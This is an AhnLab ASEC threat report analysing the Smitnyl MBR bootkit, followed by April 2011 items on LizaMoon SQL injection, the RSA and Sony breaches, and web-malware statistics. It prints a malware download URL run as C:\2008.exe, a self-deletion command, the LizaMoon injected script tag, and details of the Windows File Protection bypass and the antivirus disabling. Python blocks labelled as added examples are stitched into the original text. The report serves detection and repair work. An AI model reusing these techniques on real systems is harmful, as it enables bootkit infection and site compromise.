[Report] Malicious Codes are Getting Smart, Too (3)
By AhnLabman | June 3, 2011
This report is published by ASEC, AhnLab Security Emergency Response Center, and it analyzes the most significant security threats and the latest security technologies against these threats. For further information please visit: www.global.ahnlab.com
(3) Special Feature: Malicious Code Analysis
■ MBR Infector : Smitnyl analysis
The Master Boot Record (MBR) is the first sector of a hard disk. It lies outside any partition and holds the partition table together with the boot code that the BIOS loads to start the operating system: it tells the machine how to boot and where the individual partitions are. MBR infections are far rarer than infections of PE (Portable Executable) files, because the MBR is harder to work with, limited to 512 bytes, and a tiny bug in the code leaves the machine unable to boot at all. Recently a new bootkit, Smitnyl, was found spreading via a free file-sharing network.
1. Infection and signs of attack
Smitnyl writes its payloads to the MBR and to a few otherwise unused sectors near the start of the disk. When the system restarts, the infected MBR replaces userinit.exe, which in turn downloads a malicious file from a designated website. The MBR before and after infection is shown below:
[Fig. 1-28] Infected MBR
The process of the main dropper (Dropper/Smitnyl.37076) is shown below. The payloads that infect the MBR, the individual sectors and userinit.exe are each stored in a resource of the dropper, and the downloader is split across two resources.

[Fig. 1-29] Process of main dropper
When the resource data is loaded, the MBR and the chosen sectors are written immediately, and userinit.exe is infected at the next boot. The sequence is:
1. Saves the original MBR to sector 5.
2. Loads the userinit.exe infector payload from the resource named '71' and saves it to sector 39.
3. Loads encoded data from the resource named '72' and saves it to sector 45.
4. Loads encoded data from the resource named '6E' and saves it to sector 46.
XORed with 0x7F, the data in sectors 45 and 46 yields an executable that acts as the downloader.
5. Reads 0x200 (512) bytes from the resource named '70' and overwrites the MBR with them.
6. Reads the data that follows the first 0x200 (512) bytes of resource '70' (the MBR file-system infector routine) and saves it to sector 32.
The data in these sectors is used during boot to recreate the downloader and to infect userinit.exe. Because userinit.exe is overwritten by the infected MBR before Windows starts, the replacement is not caught by antivirus software or by WFP (Windows File Protection).
2. Function of each module
2.1 Dropper (Dropper/Smitnyl.37076)
The main functions of the dropper, Dropper/Smitnyl.37076, are as follows. It first checks whether the Chinese hard-disk monitoring tools HDDGMON.exe and DF5Serv.exe are running. If they are, it locates the resource named '6F', drops it as pcidump.sys, beep.sys or DeviceCutter.sys, and starts a service for each file.
[Fig. 1-30] Functions of dropper
It then loads the resource data used to infect the MBR and userinit.exe, writes it to the designated sectors, deletes itself and exits.
A. Bypass Windows File Protection
SFC.dll, stored in the %SYSTEM% folder, implements the system file checker. To create a file in that folder, the dropper calls SfcFileException, the DLL's 5th exported function, which exempts a file from Windows File Protection.

[Fig. 1-31] SFC.dll _ sfcFileException function used to bypass Windows File Protection
B. Backup of normal MBR
Before infecting the MBR, the dropper backs up the original MBR to sector 5. It reads the MBR into a 512-byte buffer on the stack.
[Fig. 1-32] Saving 512-byte MBR to stack
SetFilePointer then moves the file pointer to offset 0xA00 (2,560 bytes; 2560/512 = sector 5), and the MBR buffered on the stack is written there.

[Fig. 1-33] Backing up original MBR in 5th sector
C. Load data to resource sectors
As mentioned above, the dropper's main job is to load data from its resources and write it to the chosen sectors or files. The loading code is nearly the same for each resource, so we look at one case: saving resource '71' to sector 39. FindResourceA locates the resource with Type = 'RES' and Name = '71' (Size = 0xA00, Address = 0x00407050), and it is loaded. SetFilePointer then moves the file pointer to offset 0x4E00 (19,968 bytes; 19968/512 = sector 39), and the 0xA00 bytes at 0x00407050 are written there. Since each WriteFile call writes 512 bytes (0x200), the write loop runs 5 times to cover 0xA00 bytes.
[Fig. 1-34] Saving Type = ‘RES’, Name = ‘71’ resource data to 39th sector
D. Infected MBR
It uses FindResourceA to locate the resource with Type = 'RES' and Name = '70' (Size = 0xF2A, Address = 0x00406120) and overwrites the MBR sector with the first 512 bytes of that data.

[Fig. 1-35] Overwriting data in MBR sector
E. Self-deletion by main dropper
It runs 'cmd /c del %Main Dropper%\MainDropper.exe > nul' to delete itself.

[Fig. 1-36] Self-deletion routine
2.2 Infected ‘userinit.exe’ (Win-Trojan/Agent.25600.YE)
The resource named '71' in the main dropper is written to sector 39 and overwrites userinit.exe when the system restarts. The infected userinit.exe decodes and executes the encoded data stored in sector 45. If 360Safe is present, it turns off 360Safe IE Protection, then creates a fake explorer.exe in the Temporary folder (%Temp%) from the decoded sector-45 data. It also runs the real explorer.exe so that the victim sees the desktop come up normally.

[Fig. 1-37] userinit.exe infection codes saved to 39th sector
A. Termination of 360Safe IE Protection
RegOpenKeyExA is used to check whether the registry key HKEY_LOCAL_MACHINE\SOFTWARE\360Safe\safemon exists. If it does, the values 'IEProtAccess' and 'IEProtNotify' are set to 0 to turn off 360Safe IE Protection. 360Safe is a Chinese antivirus product.

[Fig. 1-38] Termination of 360Safe IE Protection
B. Creation and execution of explorer.exe
To create the fake explorer.exe it retrieves the Temporary folder path, reads the encoded data from sector 45, decodes it, writes the fake explorer.exe to the Temporary folder and runs it. It also runs the real explorer.exe so that the victim sees explorer.exe running normally. The decoding loop reads 512 bytes of sector data onto the stack, XORs each byte with 0x7F, patches the MZ and PE signatures back to '4D5A' and '5045', and appends the result to the fake explorer.exe. The loop runs nine times (9 x 512 = 4,608 bytes).

[Fig. 1-39] Decoding routine and file change
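The decoding loop described above, as an added example written for this report rather than code taken from the malware or from AhnLab: it XORs the stored data with 0x7F one 512-byte sector at a time and patches the MZ and PE signatures back in. The sample payload is constructed here (a PE-shaped blob with its signatures blanked and then XORed), so the exact stored form of the real data is an assumption; the nine-sector length matches the loop count in the analysis.

```python
"""Decode a Smitnyl-style sector payload: 512-byte sectors XORed with 0x7F,
with the MZ and PE signatures restored after decoding.
Added illustration, not code from the ASEC report; the sample data is constructed."""
import struct

SECTOR = 512
XOR_KEY = 0x7F
PAYLOAD_SECTORS = 9          # loop count from the analysis; 9 x 512 = 4,608 bytes


def decode_payload(stored: bytes, key: int = XOR_KEY) -> bytes:
    """XOR every byte with key, one sector per iteration as the malware does,
    then restore 'MZ' at offset 0 and 'PE\\0\\0' at e_lfanew (read from offset 0x3C)."""
    out = bytearray()
    for off in range(0, len(stored), SECTOR):
        out += bytes(b ^ key for b in stored[off:off + SECTOR])
    if len(out) < 0x40:
        raise ValueError('payload too short to hold a DOS header')
    out[0:2] = b'MZ'
    e_lfanew = struct.unpack_from('<I', out, 0x3C)[0]
    if e_lfanew + 4 > len(out):
        raise ValueError('e_lfanew points outside the decoded payload')
    out[e_lfanew:e_lfanew + 4] = b'PE\0\0'
    return bytes(out)


def looks_like_pe(data: bytes) -> bool:
    """True when both signatures are in place, i.e. the decode and patch succeeded."""
    if len(data) < 0x40 or data[:2] != b'MZ':
        return False
    e_lfanew = struct.unpack_from('<I', data, 0x3C)[0]
    return e_lfanew + 4 <= len(data) and data[e_lfanew:e_lfanew + 4] == b'PE\0\0'


def build_sample_sectors() -> bytes:
    """Constructed sample (assumption about the stored form): a 4,608-byte
    PE-shaped blob with e_lfanew = 0x80, both signatures blanked, then XORed
    with 0x7F the way the dropper stores it in sectors 45 and 46."""
    img = bytearray(PAYLOAD_SECTORS * SECTOR)
    struct.pack_into('<I', img, 0x3C, 0x80)        # e_lfanew
    img[0x84:0x86] = b'\x4c\x01'                    # IMAGE_FILE_HEADER.Machine = i386
    # signatures at 0x00 and 0x80 are left as zeros: the decoder must patch them
    return bytes(b ^ XOR_KEY for b in img)


if __name__ == '__main__':
    sample = build_sample_sectors()
    print('stored form is a PE:', looks_like_pe(sample))
    print('decoded form is a PE:', looks_like_pe(decode_payload(sample)))
```

The signature patching is what distinguishes this from a plain XOR: a memory or file scanner that looks for an 'MZ' header will not see one in the stored sectors, which is presumably why the author blanked the signatures rather than relying on the XOR alone.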
2.3 Fake explorer.exe (Win-Trojan/Pincav.4608.AT)
The encoded data from the resources named '72' and '6E' in the main dropper is written to sectors 45 and 46. The routine stored in sector 39 decodes it and creates and runs the fake explorer.exe. As shown below, the fake explorer.exe injects itself into IEXPLORE.EXE to perform the download.
[Fig. 1-40] Fake explorer.exe’s process
A. Execution of IEXPLORE.EXE with Hidden attribute and self-injection
It first retrieves the path 'c:\program files\Internet Explorer\IEXPLORE.EXE', runs IEXPLORE.EXE with the window hidden via WinExec, allocates memory in the new process with VirtualAllocEx, and copies itself into that memory with WriteProcessMemory.
[Fig. 1-41] IEXPLORE.EXE execution and injection
B. File download and execution
It starts the injected code with CreateRemoteThread, downloads http://sb.perfectexe.com/cs.gif, saves it as C:\2008.exe and executes it.

[Fig. 1-42] File download and execution
3. Process of infected MBR
A normal MBR locates the bootable partition in the partition table and transfers control to that partition's boot sector. The infected MBR additionally reads BOOT.INI and locates the WINDOWS and SYSTEM32 directories to find userinit.exe, then reads the payload in sector 39 and overwrites the file with it.

[Fig. 1-43] Normal operation of MBR
[Fig. 1-44] Operation of infected MBR
The infected MBR code shows that its author understands not only the MBR layout but also the FAT and NTFS on-disk structures: it uses boot-record fields and the MFT (Master File Table) record header and attributes to locate userinit.exe, then reads the payload in sector 39 and overwrites the file. A simple way to tell whether userinit.exe is infected is to look at its file properties: a clean file shows version information, an infected one does not. In a hex viewer, the infected file has the bytes 55 AA at offset 0x28; the malware uses this signature to check whether the file has already been infected.

[Fig. 1-45] “Uninfected” userinit.exe and infected userinit.exe
A. Infection of userinit.exe
The last step of the infected MBR is to obtain the starting sector and sector count of userinit.exe, read the payload from sector 39 into memory at 0x8C00, and verify the 0xAA55 signature to confirm the read succeeded before overwriting the file's sectors with the INT 13h Extended Write function (AH = 43h).

[Fig. 1-46] userinit.exe infection routine in infected MBR
4. Workaround
Testing with V3 IS 7.0: the dropper is detected and removed before the system is infected, but once the system is infected the modified MBR is neither detected nor repaired. The infected userinit.exe is detected as Win-Trojan/Agent.25600.YE but cannot be repaired, because it is a Windows system file watched by WFP (Windows File Protection): the file that needs to be removed is the one being protected. V3 used to have a boot-virus detection and repair function, but it was removed from the engine after the Defo virus issue in March 2010. As a stopgap we are providing a dedicated tool to customers whose systems are infected. It compares the partition table of the backed-up MBR in sector 5 with that of the infected MBR and, if they match, writes the backup over the infected MBR.
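A check and repair along the lines of the workaround described above, as an added example (not AhnLab's tool), using the sector layout from section 1 and the 55 AA marker at offset 0x28 of an infected userinit.exe from section 3. The disk image and boot-code bytes are constructed for the example; the rule that a restore is allowed only when the partition tables in sector 0 and sector 5 match is the one the report states.

```python
"""Triage and repair of a Smitnyl-style MBR infection on a raw disk image.
Added example for this report, not AhnLab's repair tool. The image below is
constructed, not a capture; sector numbers follow the dropper analysis."""
SECTOR = 512
BACKUP_SECTOR = 5                         # original MBR is copied here by the dropper
PAYLOAD_SECTORS = (32, 39, 45, 46)        # FS infector, userinit infector, encoded downloader
PT_OFFSET, PT_SIZE = 0x1BE, 64            # partition table: 4 x 16 bytes, then 55 AA
PARTITION_ENTRY = bytes.fromhex('8001010007feffff3f00000000800000')  # constructed entry


def sector(img: bytes, n: int) -> bytes:
    return img[n * SECTOR:(n + 1) * SECTOR]


def has_boot_signature(s: bytes) -> bool:
    return len(s) == SECTOR and s[510:512] == b'\x55\xAA'


def partition_table(s: bytes) -> bytes:
    return s[PT_OFFSET:PT_OFFSET + PT_SIZE]


def assess_image(img: bytes) -> dict:
    """Collect the indicators a responder would check before touching sector 0."""
    mbr, backup = sector(img, 0), sector(img, BACKUP_SECTOR)
    return {
        'backup_mbr_in_sector_5': has_boot_signature(backup) and any(partition_table(backup)),
        'partition_tables_match': partition_table(mbr) == partition_table(backup),
        'boot_code_differs': mbr[:PT_OFFSET] != backup[:PT_OFFSET],
        'payload_sectors_used': [n for n in PAYLOAD_SECTORS if any(sector(img, n))],
    }


def is_smitnyl_like(img: bytes) -> bool:
    a = assess_image(img)
    return (a['backup_mbr_in_sector_5'] and a['partition_tables_match']
            and a['boot_code_differs'] and 39 in a['payload_sectors_used'])


def restore_mbr(img: bytes) -> bytes:
    """Same rule as the report's workaround: write sector 5 over sector 0 only
    when both carry the same partition table; otherwise refuse to touch the disk."""
    a = assess_image(img)
    if not (a['backup_mbr_in_sector_5'] and a['partition_tables_match']):
        raise ValueError('sector 5 is not a backup of this MBR; refusing to overwrite sector 0')
    return sector(img, BACKUP_SECTOR) + img[SECTOR:]


def userinit_marker(data: bytes) -> bool:
    """The infected userinit.exe carries 55 AA at offset 0x28 (reserved area of the MZ header)."""
    return data[0x28:0x2A] == b'\x55\xAA'


def make_mbr(code: bytes) -> bytes:
    table = PARTITION_ENTRY + b'\0' * (PT_SIZE - len(PARTITION_ENTRY))
    return code.ljust(PT_OFFSET, b'\0') + table + b'\x55\xAA'


CLEAN_MBR = make_mbr(bytes.fromhex('33c08ed0bc007c8ec08ed8'))      # constructed boot code
INFECTED_MBR = make_mbr(bytes.fromhex('fa33c08ed88ed0bc007cfb'))   # different code, same table


def build_sample_image(infected: bool) -> bytes:
    """64-sector constructed image; the infected variant mirrors the dropper's layout."""
    img = bytearray(64 * SECTOR)
    img[0:SECTOR] = CLEAN_MBR
    if infected:
        img[BACKUP_SECTOR * SECTOR:(BACKUP_SECTOR + 1) * SECTOR] = CLEAN_MBR
        img[0:SECTOR] = INFECTED_MBR
        img[32 * SECTOR:32 * SECTOR + 4] = b'\xb8\x00\x8c\x8e'        # file-system infector stub
        img[39 * SECTOR:39 * SECTOR + 2] = b'MZ'                      # userinit.exe infector
        img[39 * SECTOR + 0x28:39 * SECTOR + 0x2A] = b'\x55\xAA'
        for n in (45, 46):                                            # XOR-0x7F encoded downloader
            img[n * SECTOR:n * SECTOR + 4] = bytes(b ^ 0x7F for b in b'MZ\x90\x00')
    return bytes(img)


if __name__ == '__main__':
    img = build_sample_image(infected=True)
    print(assess_image(img))
    print('repaired:', sector(restore_mbr(img), 0) == CLEAN_MBR)
```

On a live machine the same logic applies to \\.\PhysicalDrive0 opened read-only for the assessment; the partition-table comparison is what keeps a restore from writing a stale or foreign MBR onto a disk whose layout has since changed.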
5. Conclusion
Smitnyl infects the MBR, and an infected MBR is hard to detect and repair. Few cases have been reported in Korea, but many victims may not know their systems are infected, which is exactly what makes the technique attractive to attackers; if it spreads widely it will be a serious problem for security vendors. Smitnyl checks for Chinese hard-disk monitoring tools and disables 360Safe, a Chinese antivirus, which suggests Chinese authors. Chinese hacking sites and forums should therefore be monitored for information that can feed research into methods of detecting and repairing boot viruses.
2. Security Trend
(1) Security Statistics
■ Microsoft Security Updates- April 2011
Microsoft released 17 security updates this month.

[Fig. 2-1] MS Security Updates
Of the 17 updates, 12 address vulnerabilities in the operating system itself. System vulnerabilities can be exploited directly against the operating system, without any malicious software first being installed, so unpatched systems are more exposed. Proof-of-concept code is available for two of the vulnerabilities, and 9 of the 17 updates (more than half) are rated critical.
(2) Security Issues
■ LizaMoon mass SQL injection
On March 29 the US security vendor Websense reported a mass SQL injection attack on its blog under the title "LizaMoon mass injection hits over 226,000 URLs (was 28,000) including iTunes". The attack is named LizaMoon after lizamoon.com, the domain name in the injected tag. We searched Google to estimate the damage to Korean websites: the attack hit not only foreign sites but many Korean websites as well.

[Fig. 2-2] Korean websites hacked by LizaMoon SQL injection
11 web pages carried the following injected tag:
<script src=http://[malicious domain]/ur.php></script>
The address inserted into the web page redirects in three stages:
http://[malicious domain]/ur.php
-> http://[XXX].co.cc/scanXX/[number]?sessionId=[numbers]
-> http://[XXX].co.cc/scanXX/[number]/freesystemscan.exe
The page reached at the final stage downloads a rogue antivirus.
[Fig. 2-3] Download of rogue antivirus through three redirections in hacked web page
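A way to find and remove the injected tag from every text column of a site's database after such an attack, as an added example that is not part of the Websense or ASEC write-ups. It uses sqlite3 so that it runs offline; sites hit in the real campaign ran other database engines, so a production version would adapt the column enumeration to that engine's catalog. The sample rows and the example.co.cc host are constructed; only the ur.php tag shape and lizamoon.com come from the report.

```python
"""Locate and strip a LizaMoon-style injected <script> tag from every text
column of a database. Added example; sqlite3 and constructed rows stand in for
a real site's back end."""
import re
import sqlite3

# Tag shape quoted in the report; the host is left open so variants on other
# domains are caught as well.
INJECTED_TAG = re.compile(
    r"""<script\s+src=["']?https?://[^\s"'>]+/ur\.php["']?\s*>\s*</script>""", re.I)


def text_columns(conn):
    """Yield (table, column) for every character-typed column in user tables.
    Identifiers come from the schema catalog, never from user input."""
    tables = [r[0] for r in conn.execute(
        "SELECT name FROM sqlite_master WHERE type='table' AND name NOT LIKE 'sqlite_%'")]
    for t in tables:
        for cid, name, ctype, *_ in conn.execute(f'PRAGMA table_info("{t}")'):
            if 'CHAR' in ctype.upper() or 'TEXT' in ctype.upper():
                yield t, name


def find_injected(conn):
    """Return (table, column, rowid) for every cell carrying the injected tag."""
    hits = []
    for t, c in text_columns(conn):
        for rowid, value in conn.execute(f'SELECT rowid, "{c}" FROM "{t}"'):
            if isinstance(value, str) and INJECTED_TAG.search(value):
                hits.append((t, c, rowid))
    return hits


def strip_injected(conn) -> int:
    """Remove the tag from each hit; values are bound as parameters."""
    cleaned = 0
    for t, c, rowid in find_injected(conn):
        (value,) = conn.execute(f'SELECT "{c}" FROM "{t}" WHERE rowid=?', (rowid,)).fetchone()
        conn.execute(f'UPDATE "{t}" SET "{c}"=? WHERE rowid=?',
                     (INJECTED_TAG.sub('', value), rowid))
        cleaned += 1
    conn.commit()
    return cleaned


def build_sample_db():
    """Constructed site database: one clean row and three injected cells."""
    conn = sqlite3.connect(':memory:')
    conn.executescript('''
      CREATE TABLE articles(id INTEGER PRIMARY KEY, title TEXT, body TEXT);
      CREATE TABLE users(id INTEGER PRIMARY KEY, name VARCHAR(50), bio TEXT);
    ''')
    tag = '<script src=http://lizamoon.com/ur.php></script>'
    conn.executemany('INSERT INTO articles(title, body) VALUES (?, ?)', [
        ('Clean post', '<p>Nothing to see</p>'),
        ('Hit post', '<p>Read me</p>' + tag),
    ])
    conn.executemany('INSERT INTO users(name, bio) VALUES (?, ?)', [
        ('alice' + tag, 'bio' + tag.replace('lizamoon.com', 'example.co.cc')),
    ])
    conn.commit()
    return conn


if __name__ == '__main__':
    db = build_sample_db()
    print('hits:', find_injected(db))
    print('cleaned:', strip_injected(db), 'remaining:', find_injected(db))
```

Stripping the tag removes the symptom only; the injectable query that let the attacker append it to every text column has to be fixed (parameterised) as well, or the rows will be rewritten on the next pass.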
The file downloaded at the last stage is freesystemscan.exe; according to ASD (AhnLab Smart Defense) its size ranges from 2,343,424 to 2,702,848 bytes. Distributing malware through vulnerable websites has been common for years. Keep your browser and operating system fully patched, because such attacks can be launched even from trusted sites; keep your antivirus up to date; and use SiteGuard, which blocks phishing sites and malware attacks.
V3 detects this malware as:
- Trojan/Win32.FakeAV
- Win-Trojan/Malware.2343424.F
- Win-Trojan/Malware.2332672.D
- Win-Trojan/Malware.2329600.B
- Win-Trojan/Malware.2667520
■ APT attacks RSA
RSA, the security division of EMC, disclosed on March 18 that it had suffered a breach by an APT. In an "Open Letter to RSA Customers" on its website it urged customers to take extra care when using its products. APT (advanced persistent threat) describes targeted, long-running intrusions such as Operation Aurora against Google (January 2010), Stuxnet against an Iranian nuclear facility (July 2010) and Night Dragon against global energy companies (February 2011). On April 1 RSA published "Anatomy of an Attack" on its website, describing the attack method in detail.

[Fig. 2-4] RSA attack anatomy (Source: EMC/RSA)
1) Over two days, phishing mail with the subject "2011 Recruitment Plan" was sent to employees; the targets' personal details had been gathered from social networking services.
2) The attachment, 2011 Recruitment plan.xls, embedded a SWF that exploited the Adobe Flash Player zero-day vulnerability announced on March 15.
3) The exploit installed the Poison Ivy remote-access Trojan, giving the attackers remote access to the victim's machine.
4) From the infected system the attackers moved into the internal network and escalated to administrator privileges.
5) Data from the targeted systems was copied to staging systems, then compressed and encrypted.
6) The staged data was packed again into encrypted RAR archives and exfiltrated by FTP to a compromised third-party system.
The three elements of this APT were: gathering target information via social networking services, infecting the target's system by social engineering, and exploiting a zero-day vulnerability in widely used software. Corporate IT departments should train staff and executives regularly on social engineering so that they notice signs of irregularity on the internal network and systems.
■ 7.7 million account information exfiltrated from Sony PlayStation network
Data was exfiltrated from the Sony PlayStation Network, which holds game account information for users all over the world. Personal information on 420,000 people was recently stolen from a Korean financial institution, Hyundai Capital; the Sony figure, 7.7 million accounts, is of a different order. Unlike other breaches, in which name, address, e-mail address, date of birth, user ID, password and login details are taken, even more information was exfiltrated here. Sony took the network offline, so gamers could not download games or play online. According to Sony the network was attacked between April 17 and 19, but it did not disclose exactly how much information was stolen. There is no evidence that credit card data was taken, but it is possible, and the stolen information could be misused. About 230,000 Korean users were affected and are advised to change their passwords. Because Sony disclosed the breach a week after the fact, some users may face follow-on attacks. Historically these have meant spam: after account data was stolen from Play.com, for example, affected users began receiving spam. The stolen data could be used for other purposes as well. The same kind of attack could hit other networks, so companies should strengthen the protection of their customers' information.
3. Web Security Trend
(1) Web Security Statistics
[Table 3-1] Website Security Summary
As of April 2011 there were 107,713 reported malicious codes, 704 types of reported malicious code, 720 reported domains with malicious code, and 2,605 reported URLs with malicious code. The numbers of types, domains and URLs decreased from the previous month, while the number of reported malicious codes increased.
■ Monthly Blocked Malicious URLs

[Fig. 3-1] Monthly Blocked Malicious URLs
As of April 2011, the number of reported malicious codes increased 9% from 99,034 the previous month to 107,713.
■ Monthly Reported Types of Malicious Code

[Fig. 3-2] Monthly Reported Types of Malicious Code
As of April 2011, the number of reported types of malicious code decreased 7% from 759 the previous month to 704.
■ Monthly Domains with Malicious Code
[Fig. 3-3] Monthly Domains with Malicious Code
As of April 2011, the number of reported domains with malicious code decreased 9% from 780 the previous month to 720.
■ Monthly URLs with Malicious Code

[Fig. 3-4] Monthly URLs with Malicious Code
As of April 2011, the number of reported URLs with malicious code decreased 39% from 4,259 the previous month to 2,605.
■ Top Distributed Types of Malicious Code

[Fig. 3-5] Top Distributed Types of Malicious Code
As of April 2011, adware is the most distributed type of malicious code representing 13.3% (14,371 reports) of the top distributed type of malicious codes, followed by Trojan that represent 7.1% (7,602 reports).
■ Top 10 Distributed Malicious Codes
As of April 2011, Win32/Induc is the most distributed malicious code, with 51,683 cases reported. 3 new malicious codes, including Virus/Win32.Induc, entered the top 10 list this month.
(2) Web Security Issues
■ April 2011 Malicious Code Intrusion: Website
[Fig. 3-6] Monthly malicious code intrusion of website
Fig. 3-6 above shows monthly malicious-code intrusions of websites. There has been a steady increase since February, because websites monitored by our honeypot were compromised, which increased malicious-code distribution.

[Table 3-4] Top 10 Malware Distributed Via Compromised Websites
The table above lists the top 10 malware distributed via compromised websites this month. None of them appeared last month: fast response by antivirus vendors has shortened the lifespan of each sample, and variants with the same function are now cycled more quickly. This month malware was distributed by:
1. replacing a Windows file with a malicious file, and
2. exploiting vulnerabilities in Adobe Flash Player.
Refer to the following sites for further details:
- Malware replaces imm32.dll to gain your administrator’s privileges: http://core.ahnlab.com/283
- Win-Trojan/Agent.30904.H replaces Windows file with malicious file: http://core.ahnlab.com/280
- Malicious flash file targets your computer: http://core.ahnlab.com/282
The end